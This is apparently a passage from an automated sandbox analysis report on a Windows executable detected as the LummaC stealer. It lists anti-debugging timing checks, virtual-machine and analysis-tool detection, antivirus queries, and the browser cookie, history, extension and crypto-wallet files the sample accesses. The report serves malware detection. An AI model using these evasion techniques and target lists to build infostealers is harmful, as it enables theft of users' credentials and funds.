Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0847 second address: 56C084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C084B second address: 56C0851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0851 second address: 56C0039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD784F8E532h 0x0000000f xor eax, eax 0x00000011 jmp 00007FD714B89E7Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov edi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp edi, 00000000h 0x00000028 je 00007FD714BB0854h 0x0000002e call 00007FD7194DEBA7h 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov dx, 4410h 0x0000003c pushfd 0x0000003d jmp 00007FD714BB0759h 0x00000042 xor al, FFFFFF96h 0x00000045 jmp 00007FD714BB0751h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0039 second address: 56C0049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB391Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C015D second address: 56C01A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB0757h 0x00000009 add al, 0000001Eh 0x0000000c jmp 00007FD714BB0759h 0x00000011 popfd 0x00000012 mov eax, 550D87E7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C01A4 second address: 56C01A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C01A8 second address: 56C01AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C01AE second address: 56C01CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0D0D second address: 56C0D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0D13 second address: 56C0D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0D17 second address: 56C0D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0D1B second address: 56C0D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AF459Ch], 05h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD714BB391Dh 0x00000016 sub esi, 38367A26h 0x0000001c jmp 00007FD714BB3921h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 je 00007FD784F815C0h 0x0000002c jmp 00007FD714BB3923h 0x00000031 pop ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov edx, esi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0DB0 second address: 56C0DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0DBF second address: 56C0E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD714BB391Fh 0x00000008 mov ecx, 22FD5FEFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push 08F266A3h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD714BB3921h 0x0000001c sub ecx, 14435E56h 0x00000022 jmp 00007FD714BB3921h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FD714BB3920h 0x0000002e xor si, 0878h 0x00000033 jmp 00007FD714BB391Bh 0x00000038 popfd 0x00000039 popad 0x0000003a add dword ptr [esp], 6CBC3585h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD714BB3925h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56C0E4A second address: 56C0E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB074Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D09F1 second address: 56D09F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D09F5 second address: 56D0A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0A08 second address: 56D0A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD714BB391Ch 0x00000011 sbb ah, 00000068h 0x00000014 jmp 00007FD714BB391Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov al, FCh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0A47 second address: 56D0A8D instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bh, al 0x0000000b movsx edi, cx 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, bx 0x00000016 pushfd 0x00000017 jmp 00007FD714BB074Fh 0x0000001c sbb ax, 280Eh 0x00000021 jmp 00007FD714BB0759h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0A8D second address: 56D0AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FD714BB3923h 0x0000000b adc ecx, 0835661Eh 0x00000011 jmp 00007FD714BB3929h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007FD714BB391Eh 0x00000021 xchg eax, esi 0x00000022 jmp 00007FD714BB3920h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD714BB391Eh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0AFB second address: 56D0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0B01 second address: 56D0B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0B11 second address: 56D0B3A instructions: 0x00000000 rdtsc 0x00000002 mov dl, 99h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, dword ptr [ebp+0Ch] 0x0000000a jmp 00007FD714BB0754h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, 0F10167Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0B3A second address: 56D0BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 jmp 00007FD714BB391Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FD784F7117Eh 0x00000014 jmp 00007FD714BB3920h 0x00000019 cmp dword ptr [75AF459Ch], 05h 0x00000020 pushad 0x00000021 call 00007FD714BB391Eh 0x00000026 movzx ecx, dx 0x00000029 pop edi 0x0000002a movzx esi, bx 0x0000002d popad 0x0000002e je 00007FD784F8922Ah 0x00000034 pushad 0x00000035 mov eax, ebx 0x00000037 jmp 00007FD714BB3921h 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f mov ebx, eax 0x00000041 mov bl, cl 0x00000043 popad 0x00000044 push eax 0x00000045 jmp 00007FD714BB3922h 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0BBF second address: 56D0BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0BC3 second address: 56D0BE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0C97 second address: 56D0CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 jmp 00007FD714BB074Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD714BB0754h 0x00000017 jmp 00007FD714BB0755h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FD714BB074Eh 0x00000025 xor ecx, 7B0E2C88h 0x0000002b jmp 00007FD714BB074Bh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0D3B second address: 56D0D4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 65011619h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0D4D second address: 56D0D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0D51 second address: 56D0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0D55 second address: 56D0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0D5B second address: 56D0D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB391Fh 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DB8969 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DB8A90 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DB896F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F5F5C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F8CB02 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FEFFCD instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00DB81FB rdtsc

0_2_00DB81FB

Source: C:\Users\user\Desktop\file.exe TID: 6304	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6304	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058959258.0000000001963000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237279551.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156812212.000000000195D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080931138.000000000195D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2105634776.00000000060AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2105634776.00000000060A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00DB81FB rdtsc

0_2_00DB81FB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D9B480 LdrInitializeThunk,

0_2_00D9B480

Source: file.exe, file.exe, 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: \4Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2183895613.00000000019DD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 3944, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.2159875964.00000000019CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2081424148.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance(
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2081779151.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2159893711.00000000019C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
